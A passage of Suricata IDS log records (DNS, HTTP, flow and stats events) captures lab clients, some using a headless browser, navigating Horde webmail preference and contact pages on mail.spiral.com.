{"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.641290+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661}} {"timestamp":"2020-02-29T00:04:26.000170+0000","event_type":"stats","stats":{"uptime":13918,"capture":{"kernel_packets":133165,"kernel_drops":0},"decoder":{"pkts":133216,"bytes":92285631,"invalid":181,"ipv4":131779,"ipv6":8,"ethernet":133216,"raw":0,"null":0,"sll":0,"tcp":126720,"udp":4864,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2218,"failed_udp":108},"tx":{"http":4508,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2295}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2257,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23144,"memcap_state":0,"memcap_global":0},"http":{"memuse":205896,"memcap":0}}} {"timestamp":"2020-02-29T00:04:26.001199+0000","flow_id":1755149832342807,"event_type":"flow","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1481,"bytes_toclient":6174,"start":"2020-02-29T00:03:20.445719+0000","end":"2020-02-29T00:03:25.703240+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:28.151153+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} {"timestamp":"2020-02-29T00:04:29.486791+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18961,"tx_id":1}} {"timestamp":"2020-02-29T00:04:29.495288+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30120,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:29.722668+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170}} {"timestamp":"2020-02-29T00:04:32.103218+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:04:32.278299+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64802,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.455299+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} {"timestamp":"2020-02-29T00:04:33.000372+0000","event_type":"stats","stats":{"uptime":13925,"capture":{"kernel_packets":133240,"kernel_drops":0},"decoder":{"pkts":133250,"bytes":92298822,"invalid":181,"ipv4":131811,"ipv6":8,"ethernet":133250,"raw":0,"null":0,"sll":0,"tcp":126746,"udp":4870,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2220,"failed_udp":109},"tx":{"http":4510,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2297}},"flow_mgr":{"closed_pruned":2672,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":104482,"memcap":0}}} {"timestamp":"2020-02-29T00:04:34.727684+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21414,"tx_id":2}} {"timestamp":"2020-02-29T00:04:37.456381+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19290,"tx_id":1}} {"timestamp":"2020-02-29T00:04:38.001135+0000","flow_id":686372991301585,"event_type":"flow","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1393,"bytes_toclient":6242,"start":"2020-02-29T00:03:32.227281+0000","end":"2020-02-29T00:03:37.538580+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:40.000262+0000","event_type":"stats","stats":{"uptime":13932,"capture":{"kernel_packets":133273,"kernel_drops":0},"decoder":{"pkts":133276,"bytes":92306829,"invalid":181,"ipv4":131835,"ipv6":8,"ethernet":133276,"raw":0,"null":0,"sll":0,"tcp":126766,"udp":4874,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2694,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2710,"synack":2701,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1737,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2222,"failed_udp":109},"tx":{"http":4512,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2299}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":35710,"memcap":0}}} {"timestamp":"2020-02-29T00:04:40.321905+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27442,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:40.588219+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:04:40.610884+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270}} {"timestamp":"2020-02-29T00:04:45.616045+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5270},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} {"timestamp":"2020-02-29T00:04:47.000164+0000","event_type":"stats","stats":{"uptime":13939,"capture":{"kernel_packets":133281,"kernel_drops":0},"decoder":{"pkts":133294,"bytes":92314686,"invalid":181,"ipv4":131853,"ipv6":8,"ethernet":133294,"raw":0,"null":0,"sll":0,"tcp":126782,"udp":4876,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2695,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2711,"synack":2702,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1738,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2223,"failed_udp":109},"tx":{"http":4513,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2300}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24468,"memcap_state":0,"memcap_global":0},"http":{"memuse":40042,"memcap":0}}} {"timestamp":"2020-02-29T00:04:48.000452+0000","flow_id":1881129799098872,"event_type":"flow","src_ip":"192.168.10.122","src_port":42778,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.369144+0000","end":"2020-02-28T23:59:47.734840+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000632+0000","flow_id":623224072413106,"event_type":"flow","src_ip":"192.168.10.122","src_port":37719,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-28T23:59:47.106418+0000","end":"2020-02-28T23:59:47.331703+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:48.000678+0000","flow_id":2193489897440047,"event_type":"flow","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:02:47.377647+0000","end":"2020-02-29T00:03:47.408351+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:48.000945+0000","flow_id":240989174631820,"event_type":"flow","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":3514,"bytes_toclient":28564,"start":"2020-02-29T00:02:46.724364+0000","end":"2020-02-29T00:03:47.408388+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:50.047903+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32155,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:50.157141+0000","flow_id":1140587262819103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54066,"proto":"UDP","dns":{"type":"answer","id":32155,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:50.308555+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:04:50.329994+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266}} {"timestamp":"2020-02-29T00:04:53.000550+0000","flow_id":374678625694270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3294,"bytes_toclient":16546,"start":"2020-02-29T00:03:47.569918+0000","end":"2020-02-29T00:03:52.855546+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:53.000773+0000","flow_id":1505212802246177,"event_type":"flow","src_ip":"192.168.10.81","src_port":52674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:03:47.828961+0000","end":"2020-02-29T00:03:52.835319+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:54.000206+0000","event_type":"stats","stats":{"uptime":13946,"capture":{"kernel_packets":133299,"kernel_drops":0},"decoder":{"pkts":133314,"bytes":92322649,"invalid":181,"ipv4":131873,"ipv6":8,"ethernet":133314,"raw":0,"null":0,"sll":0,"tcp":126800,"udp":4878,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo